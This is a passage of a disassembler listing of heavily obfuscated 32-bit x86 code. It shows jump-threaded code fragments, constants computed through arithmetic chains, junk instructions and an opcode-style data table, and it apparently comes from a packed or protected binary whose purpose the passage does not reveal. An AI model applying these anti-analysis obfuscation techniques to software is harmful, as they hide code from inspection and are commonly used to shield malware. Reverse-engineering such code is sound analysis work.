; ---------------------------------------------------------------------------
push 448F9185h
pop eax
or eax, 0CA14D6D0h
xor eax, 0F0BB5423h
loc_43BF7C: ; CODE XREF: ut7h7i2x:004521F8j
jmp loc_43CCFE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_557. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E3D4
loc_43BF82: ; CODE XREF: sub_44E3D4+17j
or eax, 700D82CCh
add eax, 82A742BAh
xchg eax, [esp+0]
jmp sub_456520
; END OF FUNCTION CHUNK FOR sub_44E3D4
; ---------------------------------------------------------------------------
xchg edi, [edx]
jo loc_44C17A
jmp sub_44DC72
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_43BFA3: ; CODE XREF: sub_44865D:loc_452B57j
or eax, 837F20C6h
loc_43BFA9: ; CODE XREF: sub_43CAF4-E24j
jmp sub_455CF9
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AE1A
loc_43BFAE: ; CODE XREF: sub_43AE1A:loc_43BEFEj
; sub_43AE1A+782Bj
call sub_443FC3
loc_43BFB3: ; CODE XREF: sub_451A5A+10j
jmp loc_452D07
; END OF FUNCTION CHUNK FOR sub_43AE1A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443E2D
loc_43BFB8: ; CODE XREF: sub_443E2D+Dj
jmp nullsub_51
; END OF FUNCTION CHUNK FOR sub_443E2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45500F
loc_43BFBD: ; CODE XREF: sub_45500F-1B675j
; sub_45500F:loc_43BF2Aj
push 1AC6C122h
pop edx
xor edx, 0E74E53C3h
sub edx, 0F14CB55Dh
and edx, 0FAB00870h
add edx, 41A5EA3Bh
xor edx, 0D44C5D87h
jmp loc_457718
; END OF FUNCTION CHUNK FOR sub_45500F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_449. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_43BFE7: ; CODE XREF: sub_43FF65+1903Aj
jmp sub_43F3D1
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442E76
loc_43BFEC: ; CODE XREF: sub_442E76+10534j
jmp nullsub_478
; END OF FUNCTION CHUNK FOR sub_442E76
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B452
loc_43BFF1: ; CODE XREF: sub_44B452+7j
jmp loc_448641
; END OF FUNCTION CHUNK FOR sub_44B452
; ---------------------------------------------------------------------------
loc_43BFF6: ; CODE XREF: ut7h7i2x:00458F45j
and edi, esi
; =============== S U B R O U T I N E =======================================
sub_43BFF8 proc near ; CODE XREF: sub_43C0AF+8p
; FUNCTION CHUNK AT 00440763 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00441DDF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446CAF SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00459871 SIZE 0000001C BYTES
xchg ecx, [esp+0]
pop ecx
push 89D43843h
jmp loc_441DDF
sub_43BFF8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
add edx, 32B35650h
jmp sub_44BF76
; ---------------------------------------------------------------------------
mov ebp, [ebx]
jmp loc_4396FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_43C018: ; CODE XREF: sub_444EAA:loc_448D64j
call sub_450472
; END OF FUNCTION CHUNK FOR sub_444EAA
; START OF FUNCTION CHUNK FOR sub_43A92F
loc_43C01D: ; CODE XREF: sub_43A92F:loc_4554B3j
jns loc_44AA18
loc_43C023: ; CODE XREF: sub_4462B0+4EAAj
sub al, 99h
mov edx, [ebp-4]
imul byte ptr [edx]
push offset sub_43B513
jmp nullsub_219
; END OF FUNCTION CHUNK FOR sub_43A92F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452CBB
loc_43C034: ; CODE XREF: sub_452CBB+62ACj
jnz loc_45825F
; END OF FUNCTION CHUNK FOR sub_452CBB
; START OF FUNCTION CHUNK FOR sub_452802
loc_43C03A: ; CODE XREF: sub_452802-BEBCj
jmp loc_4410BC
; END OF FUNCTION CHUNK FOR sub_452802
; ---------------------------------------------------------------------------
rol edi, 14h
adc ebp, esi
jmp loc_458258
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442C48
loc_43C049: ; CODE XREF: sub_442C48+1Cj
push offset loc_449433
jmp loc_44074B
; END OF FUNCTION CHUNK FOR sub_442C48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F738
loc_43C053: ; CODE XREF: sub_44F738:loc_44701Bj
push eax
ror eax, 12h
push ebx
push 2E02C1C3h
jmp loc_454BB0
; END OF FUNCTION CHUNK FOR sub_44F738
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_43C062: ; CODE XREF: sub_450FDE:loc_4554AEj
cmp byte ptr [eax], 0F1h
jnz loc_451AAF
jmp loc_43F688
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E6EB
loc_43C070: ; CODE XREF: sub_43E6EB+179D2j
call sub_43BA59
or eax, eax
; END OF FUNCTION CHUNK FOR sub_43E6EB
; START OF FUNCTION CHUNK FOR sub_43A218
loc_43C077: ; CODE XREF: sub_43A218:loc_449F96j
jnz loc_43AB2E
jmp loc_44AFF8
; END OF FUNCTION CHUNK FOR sub_43A218
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_43C082: ; CODE XREF: sub_44602A:loc_4538CEj
or ebp, edx
pushf
jmp loc_450B88
; END OF FUNCTION CHUNK FOR sub_44602A
; =============== S U B R O U T I N E =======================================
sub_43C08A proc near ; CODE XREF: ut7h7i2x:0044A7FCj
; sub_4552AC-1A81p
; FUNCTION CHUNK AT 0043D943 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
lea eax, aHcie ; "hciE"
push offset loc_448B57
jmp loc_43D943
sub_43C08A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44947D
loc_43C09E: ; CODE XREF: sub_44947D+C756j
lea eax, [ebp-12Dh]
mov [ebp-28h], eax
; END OF FUNCTION CHUNK FOR sub_44947D
; START OF FUNCTION CHUNK FOR sub_44A5AB
loc_43C0A7: ; CODE XREF: sub_44A5AB+7j
mov eax, [ebp-24h]
call sub_449E96
; END OF FUNCTION CHUNK FOR sub_44A5AB
; =============== S U B R O U T I N E =======================================
sub_43C0AF proc near ; CODE XREF: ut7h7i2x:0043F8B6p
xchg ecx, [esp+0]
pop ecx
loc_43C0B3: ; CODE XREF: sub_449FB0:loc_43B2A4j
ror eax, 0Ah
push edx
call sub_43BFF8
loc_43C0BC: ; CODE XREF: sub_4487B0-35D2j
jmp sub_44B5CF
sub_43C0AF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A218
loc_43C0C1: ; CODE XREF: sub_43A218+12j
call sub_43BA59
or eax, eax
jmp loc_449F96
; END OF FUNCTION CHUNK FOR sub_43A218
; ---------------------------------------------------------------------------
loc_43C0CD: ; CODE XREF: ut7h7i2x:00456737j
mov edx, ds:dword_453CC0
or edx, edx
jmp loc_43938E
; =============== S U B R O U T I N E =======================================
sub_43C0DA proc near ; CODE XREF: sub_44875F-69DEp
; ut7h7i2x:004458D9j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043BE41 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0043D07E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004417A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044254D SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00445158 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00448938 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00449BFD SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00449CCA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B2C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E580 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044EA78 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450503 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004524BB SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00454203 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004556F3 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00456858 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457698 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004577A5 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459E89 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0045A377 SIZE 00000011 BYTES
xchg ebx, [esp+0]
pop ebx
or eax, eax
jnz loc_4524BB
jmp loc_457698
sub_43C0DA endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_315. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A4D
loc_43C0EC: ; CODE XREF: sub_444A4D+21j
jmp loc_449E0F
; END OF FUNCTION CHUNK FOR sub_444A4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_43C0F1: ; CODE XREF: sub_442B3B-788Bj
and esi, ecx
loc_43C0F3: ; CODE XREF: sub_449FB0:loc_456F33j
mov eax, [esp+0]
call sub_4594B7
loc_43C0FB: ; CODE XREF: sub_449FB0+8j
; sub_439FD5+1B054j
xchg eax, [esp+0]
mov edx, eax
push eax
push 51299CC8h
pop eax
jmp loc_456BF4
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
push 72845C4Fh
or ecx, 0C660A61Ah
jmp sub_444113
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4398BF
loc_43C11C: ; CODE XREF: sub_4398BF:loc_43B229j
pop edi
jmp loc_43B080
; END OF FUNCTION CHUNK FOR sub_4398BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DF79
loc_43C122: ; CODE XREF: sub_44DF79j
mov eax, ds:dword_459858
or eax, eax
jnz loc_44711A
jmp loc_4410DA
; END OF FUNCTION CHUNK FOR sub_44DF79
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E592
loc_43C135: ; CODE XREF: sub_43E592:loc_4567C4j
push offset sub_440E2C
jmp nullsub_262
; END OF FUNCTION CHUNK FOR sub_43E592
; ---------------------------------------------------------------------------
jmp ds:dword_41D1B8
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov dl, 0FBh
inc esp
add cl, ch
add [ecx+eax+9C8C100h], eax
push ecx
push 0CB30A849h
or ecx, 43455BA8h
jmp loc_441834
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4494C0
loc_43C163: ; CODE XREF: sub_4494C0+1Ej
popf
xchg edx, [esp-4+arg_0]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_4494C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D5DC
loc_43C16C: ; CODE XREF: sub_44D5DC+539Ej
or ecx, 9777AA45h
rol ecx, 14h
add ecx, 2490B14h
popf
xchg ecx, [esp+4+var_4]
jmp sub_43F058
; END OF FUNCTION CHUNK FOR sub_44D5DC
; =============== S U B R O U T I N E =======================================
sub_43C184 proc near ; CODE XREF: sub_43E658j
; DATA XREF: sub_4497C1-B173o
add ebx, 0BD903AC6h
xchg ebx, [esp+0]
jmp sub_4589FE
sub_43C184 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445056
loc_43C192: ; CODE XREF: sub_445056+8j
jz loc_449D02
jmp loc_44AB68
; END OF FUNCTION CHUNK FOR sub_445056
; ---------------------------------------------------------------------------
popf
jmp loc_4574CD
; ---------------------------------------------------------------------------
loc_43C1A3: ; CODE XREF: ut7h7i2x:loc_442DAEj
sub eax, 68636093h
xor eax, 0EF9F709Bh
sub eax, 0D0B95EC6h
or eax, 1C8D5833h
xor eax, 1FFD7F2Bh
jmp loc_442868
; ---------------------------------------------------------------------------
loc_43C1C6: ; DATA XREF: ut7h7i2x:0043935Fo
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D5BE
loc_43C1C8: ; CODE XREF: sub_44D5BE-1828j
jmp sub_43CA2D
; END OF FUNCTION CHUNK FOR sub_44D5BE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_43C1CD: ; CODE XREF: sub_4524FE-7E6Aj
jmp loc_43DE68
; END OF FUNCTION CHUNK FOR sub_4524FE
; =============== S U B R O U T I N E =======================================
sub_43C1D2 proc near ; CODE XREF: sub_4448AF-AC86p
; sub_456397:loc_44D993j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439195 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00445734 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00449824 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044A1C3 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044E2FF SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00452A0F SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00454C6F SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00456176 SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00458B8D SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00458E7D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045A47C SIZE 0000000B BYTES
mov eax, ds:dword_443780
or eax, eax
jnz loc_445734
jmp loc_45A47C
sub_43C1D2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43C1E5 proc near ; CODE XREF: ut7h7i2x:004410CCj
; ut7h7i2x:0045342Cp
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00440E9C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441F89 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004421D8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004444B9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444847 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004489B4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448FD8 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00449A28 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452D38 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454526 SIZE 00000016 BYTES
xchg ecx, [esp+0]
pop ecx
push 10h
call sub_43EE25
mov [ebp-10h], eax
cmp dword ptr [ebp-10h], 0
jz loc_44DB32
jmp loc_452D38
sub_43C1E5 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_546. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447F0A
loc_43C203: ; CODE XREF: sub_447F0A+1Fj
call sub_44A4C0
cmp ds:dword_4513A4, 0
jnz loc_45646D
jmp loc_43959D
; END OF FUNCTION CHUNK FOR sub_447F0A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_43C21A: ; CODE XREF: sub_43CCC3+3D8Cj
pushf
loc_43C21B: ; CODE XREF: sub_43CCC3:loc_43D862j
mov eax, [ebp-108h]
mov byte ptr [ebp+eax-100h], 0
push 2010h
push 0
lea eax, [ebp-100h]
jmp loc_4392DC
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
jmp ds:off_41D01C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A0CE
loc_43C241: ; CODE XREF: sub_44A0CE+25j
jmp loc_451CDA
; END OF FUNCTION CHUNK FOR sub_44A0CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44715B
loc_43C246: ; CODE XREF: sub_44715B+7j
; ut7h7i2x:00451A1Aj ...
jnb loc_459427
xchg eax, [esp+0]
mov edx, eax
pop eax
push offset loc_458D3E
jmp loc_43AE97
; END OF FUNCTION CHUNK FOR sub_44715B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EB88
loc_43C25C: ; CODE XREF: sub_44EB88:loc_4500B1j
jz loc_44162B
jmp loc_44E053
; END OF FUNCTION CHUNK FOR sub_44EB88
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_498. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_43C268: ; CODE XREF: sub_44E6A8+7j
jmp loc_43EE17
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
loc_43C26D: ; CODE XREF: ut7h7i2x:00445535j
; ut7h7i2x:00451C1Ej
xor edi, 4CF3CA0Ch
rol edi, 10h
add edi, 7BE6A782h
mov [edi], eax
pop edi
lea eax, sub_45A907
jmp loc_452010
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_198. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_43C28B: ; CODE XREF: sub_452B14-9C33j
jmp nullsub_326
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
not edx
jl nullsub_201
jmp sub_4431E4
; ---------------------------------------------------------------------------
loc_43C29D: ; CODE XREF: ut7h7i2x:loc_44E4B2j
; ut7h7i2x:0044E4C0j
rol eax, 17h
or eax, 0A1A5BACCh
add eax, 0FF8A8B3Eh
call sub_4561A8
; START OF FUNCTION CHUNK FOR sub_45A79F
loc_43C2B1: ; CODE XREF: sub_45A79F-5E35j
jmp loc_457F8A
; END OF FUNCTION CHUNK FOR sub_45A79F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454DE8
loc_43C2B6: ; CODE XREF: sub_454DE8:loc_4396F0j
push edx
pop ecx
xchg ecx, [esp+0]
push offset loc_44CCA7
jmp loc_44C34C
; END OF FUNCTION CHUNK FOR sub_454DE8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_43C2C5: ; CODE XREF: sub_449E96:loc_4428F1j
; sub_4576C6-109F2j
popf
xchg edx, [esp-4+arg_0]
call sub_4516C6
loc_43C2CE: ; CODE XREF: sub_44DB48-5B9j
jmp loc_44D14B
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43C2D3: ; CODE XREF: sub_439BF8:loc_43CD03j
xor esi, 2ECB9D42h
and esi, 0DA224AF1h
cmp esi, 0F91F7FF0h
jmp loc_448208
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4445DC
loc_43C2EA: ; CODE XREF: sub_4445DC:loc_44A8A5j
adc ebp, eax
jno loc_445209
and esi, eax
; END OF FUNCTION CHUNK FOR sub_4445DC
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_43C2F4: ; CODE XREF: sub_447CBE:loc_43A922j
jmp loc_455322
; END OF FUNCTION CHUNK FOR sub_447CBE
; =============== S U B R O U T I N E =======================================
sub_43C2F9 proc near ; CODE XREF: ut7h7i2x:0043C9A0j
; sub_45854D-8821p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044B0DF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004570B7 SIZE 00000011 BYTES
xchg esi, [esp+0]
pop esi
push eax
push ebx
jmp loc_44B0DF
sub_43C2F9 endp
; ---------------------------------------------------------------------------
loc_43C304: ; CODE XREF: ut7h7i2x:00441B72j
cmp ebx, 0CC18B863h
jmp loc_4426D3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_237. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp ds:off_41D098
; ---------------------------------------------------------------------------
loc_43C316: ; CODE XREF: ut7h7i2x:00451B20j
jmp loc_4427ED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4446B0
loc_43C31B: ; CODE XREF: ut7h7i2x:0043E761j
; sub_445AD1:loc_440A04j ...
js loc_4446BC
pop edx
mov eax, [esp-4+arg_0]
loc_43C325: ; CODE XREF: ut7h7i2x:loc_43D818j
push edi
jmp loc_453DE0
; END OF FUNCTION CHUNK FOR sub_4446B0
; ---------------------------------------------------------------------------
add edx, 366141B3h
rol eax, 0Ch
jmp sub_449D60
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_154. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_43C33A: ; CODE XREF: sub_43DBEC+9B19j
; sub_450176+9j
jmp loc_44C1AB
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
loc_43C33F: ; CODE XREF: ut7h7i2x:0044C508j
jmp loc_439383
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459111
loc_43C344: ; CODE XREF: ut7h7i2x:loc_44E374j
; sub_459111-167Bj
jnz loc_43D9A1
and ebp, 3A6EDAC1h
loc_43C350: ; CODE XREF: sub_459111:loc_4488D0j
push 0F4C79201h
pop eax
rol eax, 9
cmp eax, 942FF61Ah
jmp loc_4550C8
; END OF FUNCTION CHUNK FOR sub_459111
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_43C364: ; CODE XREF: sub_4503C3:loc_452FD7j
sub eax, 0F71E9670h
add eax, 3966CA02h
add eax, ebp
add eax, 0B297CBF4h
mov eax, [eax]
cmp byte ptr [eax], 0F1h
jnz loc_451E6A
jmp loc_443386
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
sub eax, edx
jmp sub_43B7F7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_351. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_43C390: ; CODE XREF: sub_43FF65+146j
jmp loc_4462DD
; END OF FUNCTION CHUNK FOR sub_43FF65
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_102. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_43C396: ; CODE XREF: ut7h7i2x:00447B7Fj
jmp loc_4480C6
; =============== S U B R O U T I N E =======================================
sub_43C39B proc near ; CODE XREF: sub_439BF8:loc_4448CBj
; ut7h7i2x:loc_449EDCj ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00445F77 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00449982 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C5BF SIZE 00000014 BYTES
pop edx
jnz loc_445F77
push offset loc_446DE2
jmp loc_449982
sub_43C39B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43C3AC: ; CODE XREF: ut7h7i2x:loc_44B8F3j
jnz loc_44BB69
jmp loc_44DB2B
; =============== S U B R O U T I N E =======================================
sub_43C3B7 proc near ; CODE XREF: sub_449FD5-7BB0p
; ut7h7i2x:00448051j
; FUNCTION CHUNK AT 0043A90B SIZE 00000004 BYTES
; FUNCTION CHUNK AT 0043FC55 SIZE 0000001A BYTES
xchg ebx, [esp+0]
pop ebx
push eax
ror eax, 3
push ebx
push 67645FD2h
pop ebx
or ebx, 819F5168h
jmp loc_43FC55
sub_43C3B7 endp
; ---------------------------------------------------------------------------
loc_43C3D1: ; CODE XREF: ut7h7i2x:loc_439E3Cj
jz loc_448B0A
jmp loc_442F0A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450645
loc_43C3DC: ; CODE XREF: sub_450645+31B4j
test edi, 8E6D5962h
jmp loc_43B7A1
; END OF FUNCTION CHUNK FOR sub_450645
; ---------------------------------------------------------------------------
mov [ebp+0], ebx
xor eax, ecx
jmp sub_446996
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4456F4
loc_43C3F1: ; CODE XREF: sub_4456F4:loc_450B95j
push offset loc_4412D0
jmp loc_44C339
; END OF FUNCTION CHUNK FOR sub_4456F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B72F
loc_43C3FB: ; CODE XREF: sub_44B72F:loc_43F77Fj
and eax, 0FFFF7FFFh
push ecx
mov ecx, edx
xchg ecx, [esp+4+var_4]
push 702903B9h
xchg esi, [esp+8+var_8]
jmp loc_441B78
; END OF FUNCTION CHUNK FOR sub_44B72F
; =============== S U B R O U T I N E =======================================
sub_43C413 proc near ; CODE XREF: ut7h7i2x:0043ADF3j
; sub_44A3D0+AA56p
; FUNCTION CHUNK AT 00443381 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456633 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045A963 SIZE 0000000B BYTES
xchg edx, [esp+0]
pop edx
or eax, eax
jnz loc_456633
jmp loc_443381
sub_43C413 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43C424: ; CODE XREF: ut7h7i2x:00449687j
ror ebx, 18h
jp loc_449A7C
loc_43C42D: ; CODE XREF: ut7h7i2x:loc_448032j
call sub_44FA51
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_443816
loc_43C433: ; CODE XREF: sub_4489DF:loc_44702Bj
; sub_443816+10C8Aj
jmp loc_448F84
; END OF FUNCTION CHUNK FOR sub_443816
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450651
loc_43C438: ; CODE XREF: sub_450651-7440j
jmp nullsub_261
; END OF FUNCTION CHUNK FOR sub_450651
; ---------------------------------------------------------------------------
db 74h, 0D2h, 34h
dword_43C440 dd 7E738037h ; DATA XREF: sub_4503C3:loc_4556D4r
dword_43C444 dd 77E75CB5h ; DATA XREF: sub_4390BF+4w
; sub_4544E6:loc_43FFEFr ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DB48
loc_43C448: ; CODE XREF: sub_44DB48-8AD4j
jmp loc_4436B2
; END OF FUNCTION CHUNK FOR sub_44DB48
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43C44D: ; CODE XREF: sub_439BF8+3E84j
jmp loc_4501EC
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
dw 60F3h
dword_43C454 dd 2 ; DATA XREF: sub_4524FE-11B28r
; ut7h7i2x:00446A80r ...
dd 3 dup(2), 0C0h, 40h, 2 dup(1), 4 dup(2), 0C0h, 40h
dd 2 dup(1), 4 dup(2), 0C0h, 40h, 2 dup(1), 4 dup(2), 0C0h
dd 40h, 2 dup(1), 4 dup(2), 0C0h, 40h, 0
dd 1, 4 dup(2), 0C0h, 40h, 0
dd 1, 4 dup(2), 0C0h, 40h, 0
dd 401h, 4 dup(2), 0C0h, 40h, 0
dd 23h dup(1), 2 dup(2), 4 dup(0)
dd 40h, 42h, 0C0h, 0C2h, 4 dup(1), 10h dup(1E00h), 0C2h
dd 42h, 2 dup(0C2h), 0Ch dup(2), 0Ah dup(1), 60h, 5 dup(1)
dd 4 dup(8), 4 dup(1), 0C0h, 40h, 6 dup(1), 8 dup(0C0h)
dd 8 dup(40h), 2 dup(1C2h), 20h, 1, 2 dup(2), 0C2h, 42h
dd 1E0h, 1, 20h, 2 dup(1), 0C0h, 2 dup(1), 4 dup(2), 2 dup(0C0h)
dd 2 dup(1), 8 dup(2), 4 dup(1A00h), 4 dup(0C0h), 800h
dd 0A00h, 60h, 1A00h, 4 dup(1), 0
dd 1, 2 dup(0)
dd 2 dup(1), 2 dup(2), 6 dup(1), 2 dup(2), 4499E9h, 12AE900h
dd 0E6E80000h
db 0EDh, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_43C863: ; CODE XREF: sub_448321:loc_452F2Fj
mov ebx, edx
xchg ebx, [esp+0]
push esi
push 0AE591EE1h
pop esi
and esi, 0D977F0B0h
add esi, 77F40590h
jmp loc_44112D
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
loc_43C880: ; CODE XREF: ut7h7i2x:0043A8E4j
push 0CE403DD1h
; START OF FUNCTION CHUNK FOR sub_455145
loc_43C885: ; CODE XREF: sub_455145:loc_43A8D2j
and ecx, 7151A238h
rol ecx, 18h
call sub_445A04
loc_43C893: ; CODE XREF: sub_43E6CC-36B3j
; sub_4408C2+1A18Aj
jmp loc_439D0B
; END OF FUNCTION CHUNK FOR sub_455145
; ---------------------------------------------------------------------------
adc eax, 4F5695C2h
jmp sub_44F9A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4462B0
loc_43C8A3: ; CODE XREF: sub_4462B0:loc_43BB15j
; sub_4462B0+DAA6j
mov eax, 80F02D07h
push esi
push 5FB595DEh
pop esi
or esi, 32E2601Ch
jmp loc_45970D
; END OF FUNCTION CHUNK FOR sub_4462B0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A08
loc_43C8BA: ; CODE XREF: sub_444A08+5j
call sub_445FA9
loc_43C8BF: ; CODE XREF: sub_4490B0-8B67j
jmp loc_43AD67
